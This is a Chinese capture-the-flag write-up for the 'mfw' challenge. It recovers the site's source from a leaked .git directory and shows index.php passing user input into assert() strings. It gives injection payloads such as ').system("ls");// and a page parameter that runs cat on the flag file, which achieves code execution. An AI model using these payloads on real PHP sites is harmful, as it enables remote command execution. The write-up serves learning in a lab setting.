mfw git泄露构造闭合

这题也挺有想法 第一次确实没有想到

首先我们可以扫出 git

然后

我们githack 泄露一下

然后我们看index.php代码

复制代码
<?php

if (isset($_GET['page'])) {
	$page = $_GET['page'];
} else {
	$page = "home";
}

$file = "templates/" . $page . ".php";

// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");

问题代码出现在

复制代码
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");

这里的参数是可以闭合的 因为是可控的


我们构造 ')


assert("strpos('')', '..') === false") or die("Detected hacking attempt!");

然后我们可以在后面面接上其他php语句


这里有两个


').system("ls");//


或者

') or system("ls");//

最后payload

就是替换为cat即可

复制代码
/?page=').system("cat ./templates/flag.php");//
相关推荐
中微子6 小时前
Git Rebase 详解:概念、原理与实战示例
git
荔枝吻9 小时前
【保姆级喂饭教程】Windows下安装Git Flow
windows·git·git flow
云和数据.ChenGuang13 小时前
git中的指令解释
git
小Lu的开源日常14 小时前
在 macOS 上设置 SSH 和 Git
git·macos·ssh
eleven_h14 小时前
ERROR: Permission to Splode/pomotroid.git deni
git
WZF-Sang15 小时前
计算机网络基础——1
网络·c++·git·学习·计算机网络·智能路由器
石头wang17 小时前
如何在idea里快速地切换Windows CMD、git bash、powershell
windows·git·bash·intellij-idea
SkyrimCitadelValinor17 小时前
Git【开源分布式版本控制工具】安装-配置-常用指令-Git远程仓库-IDEA使用Git
分布式·git·gitee·开源·项目管理
mmsx2 天前
使用git生成ssh的ed25519密钥
运维·git·ssh
荔枝吻2 天前
【保姆级喂饭教程】Git图形化客户端Sourcetree安装及使用教程
git·sourcetree